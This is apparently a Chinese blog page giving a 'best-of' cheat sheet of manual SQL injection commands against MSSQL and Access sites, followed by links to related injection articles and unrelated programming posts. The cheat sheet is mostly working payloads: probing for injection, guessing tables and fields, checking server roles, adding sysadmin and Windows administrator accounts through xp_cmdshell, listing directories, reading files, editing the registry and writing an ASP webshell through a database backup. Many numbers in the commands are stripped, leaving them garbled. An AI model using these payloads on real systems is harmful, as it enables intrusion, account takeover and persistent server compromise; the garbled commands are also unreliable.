.判断是否有注入;and = ;and =
  .初步判断是否是mssql ;and user>   .注入参数是字符and [查询条件] and =   .搜索时没过滤参数的and [查询条件] and %=   .判断数据库系统   ;and (select count(*) from sysobjects)> mssql   ;and (select count(*) from msysobjects)> access   .猜数据库 ;and (select Count(*) from [数据库名])>   .猜字段 ;and (select Count(字段名) from 数据库名)>   .猜字段中记录长度 ;and (select top len(字段名) from 数据库名)>   .()猜字段的ascii值(access)   ;and (select top asc(mid(字段名,,)) from 数据库名)>   ()猜字段的ascii值(mssql)   ;and (select top unicode(substring(字段名,,)) from 数据库名)>   .测试权限结构(mssql)   ;and =(select IS_SRVROLEMEMBER(sysadmin));--   ;and =(select IS_SRVROLEMEMBER(serveradmin));--   ;and =(select IS_SRVROLEMEMBER(setupadmin));--   ;and =(select IS_SRVROLEMEMBER(securityadmin));--   ;and =(select IS_SRVROLEMEMBER(diskadmin));--   ;and =(select IS_SRVROLEMEMBER(bulkadmin));--   ;and =(select IS_MEMBER(db_owner));--   .添加mssql和系统的帐户   ;exec master.dbo.sp_addlogin username;--
  ;exec master.dbo.sp_password null,username,password;--   ;exec master.dbo.sp_addsrvrolemember sysadmin username;--   ;exec master.dbo.xp_cmdshell net user username password   /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add;--   ;exec master.dbo.xp_cmdshell net user username password /add;--   ;exec master.dbo.xp_cmdshell net localgroup administrators username /add;--   .()遍历目录   ;create table dirs(paths varchar(), id int)   ;insert dirs exec master.dbo.xp_dirtree c:   ;and (select top paths from dirs)>   ;and (select top paths from dirs where paths not in(上步得到的paths))>)   ()遍历目录   ;create table temp(id nvarchar(),num1 nvarchar(),num2 nvarchar(),num3 nvarchar());--
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器   ;insert into temp(id) exec master.dbo.xp_subdirs c:;-- 获得子目录列表   ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;-- 获得所有子目录的目录树构   ;insert into temp(id) exec master.dbo.xp_cmdshell type c:webindex.asp;-- 查看文件的内容   .mssql中的存储过程   xp_regenumvalues 注册表根键, 子键   ;exec xp_regenumvalues HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun 以多个记录集方式返回所有键值   xp_regread 根键,子键,键值名   ;exec xp_regread   HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,CommonFilesDir 返回制定键的值   xp_regwrite 根键,子键, 值名, 值类型, 值   值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型   ;exec xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName,reg_sz,hello 写入注册表   xp_regdeletevalue 根键,子键,值名   exec xp_regdeletevalue HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName 删除某个值   xp_regdeletekey HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionTestkey 删除键,包括该键下所有值   .mssql的backup创建webshell   use model   create table cmd(str image);   insert into cmd(str) values ();   backup database model to disk=c:l.asp;   .mssql内置函数   ;and (select @@version)> 获得Windows的版本号   ;and user_name()=dbo 判断当前系统的连接用户是不是sa   ;and (select user_name())> 爆当前系统的连接用户   ;and (select db_name())> 得到当前连接的数据库   .简洁的webshell   use model   create table cmd(str image);   insert into cmd(str) values ();   backup database model to disk=g:wwwtestl.asp;

手动方式SQL注入脚本命令之精华版的更多相关文章

  1. SQL注入常用命令

    1. 数据库查询版本 Mssql select @@version Mysql select vresion()/select @@version oracle select banner from ...

  2. phpcms v9 sql注入脚本

    phpcms v9 SQL注入脚本 用法:python phpcms.py http://www.baidu.com import requests,sys,urllib url = sys.argv ...

  3. python 打造一个sql注入脚本 (一)

    0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...

  4. 安全测试5_服务端的安全漏洞(SQL注入、命令注入、文件操作类)

    前面大致讲解了下客户端的安全漏洞,现在来讲解下服务端的安全漏洞. 1.SQL注入(SQL Injection),是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问或修改数据,或者利用潜在的数据库 ...

  5. 常规SQL注入脚本

    一:union报错注入 猜字段长度:order by 28 先显示位http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,9 当前数 ...

  6. SQL注入脚本(基于时间)

    #encoding=utf-8 import httplib import time import string import sys import urllib header = {'Accept' ...

  7. 禁用substr、substring、mid函数的sql注入脚本

    #encodeing=utf-8 import requests import sys reload(sys) sys.setdefaultencoding('utf-8') payloads = l ...

  8. SQL注入技术专题—由浅入深【精华聚合】

    作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23569276来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 不管用什么语言编写的Web应用 ...

  9. SQL注入学习资料总结

    转载自:https://bbs.ichunqiu.com/thread-12105-1-1.html  什么是SQL注入 SQL注入基本介绍 结构化查询语言(Structured Query Lang ...

随机推荐

  1. jquery.datepicker、jquery.validate、jquery.uploadify冲突解决

    Jquery 1.11.2 Jquery.validate 1.13.1 Jquery.Uploadify 3.2(flash版) Jquery.DatePicker 用的是Jquery-ui 1.1 ...

  2. 算法笔记_207:第五届蓝桥杯软件类决赛部分真题(Java语言C组)

    目录 1 数字拆分 2 稍大的串   前言:以下代码仅供参考,若有错误欢迎指正哦~ 1 数字拆分 正整数可以表示为若干正整数的累加和. 如,对于正整数n=6,可以分划为: 6 5+1 4+2 4+1+ ...

  3. 算法笔记_187:历届试题 网络寻路(Java)

    目录 1 问题描述 2 解决方案   1 问题描述 问题描述 X 国的一个网络使用若干条线路连接若干个节点.节点间的通信是双向的.某重要数据包,为了安全起见,必须恰好被转发两次到达目的地.该包可能在任 ...

  4. 事务的四大特性ACID介绍

    事务是恢复和并发控制的基本单位.ACID 事务应该具有4个属性:原子性.一致性.隔离性.持续性.这四个属性通常称为ACID特性. 原子性(atomicity).一个事务是一个不可分割的工作单位,事务中 ...

  5. ie上画圆饼图

    概述 主要运用到CSS3的transform.js.jq实现饼状图效果 详细 代码下载:http://www.demodashi.com/demo/10579.html 一.准备工作 1.主要运用到C ...

  6. mysql之InnoDB内存管理

    InnoDB缓冲池是通过LRU算法来管理page的.频繁使用的page放在LRU列表的前端,最少使用的page在LRU列表的尾端,缓冲池满了的时候,优先淘汰尾端的page. InnoDB中的LRU结构 ...

  7. PHP读取大文件的几种方法

    场景:PHP读取超大文件,例如1G的日志文件,我这里使用的是400M的access.log文件 1.使用file直接读取 <?php $starttime=microtime_float(); ...

  8. 利用ASP.NET一般处理程序动态生成Web图像(转)

    摘自:http://www.cnblogs.com/zhouhb/archive/2011/02/15/1955262.html 一般处理程序的扩展名为ashx,它实现了IHttpHandler接口, ...

  9. 使用padding代替高度实现背景图片高度按比例自适应

    本篇文章由:http://xinpure.com/use-padding-instead-of-highly-adaptive-background-image-height-proportionat ...

  10. php 回收周期(Collecting Cycles)

    http://docs.php.net/manual/zh/features.gc.collecting-cycles.php 传统上,像以前的 php 用到的引用计数内存机制,无法处理循环的引用内存 ...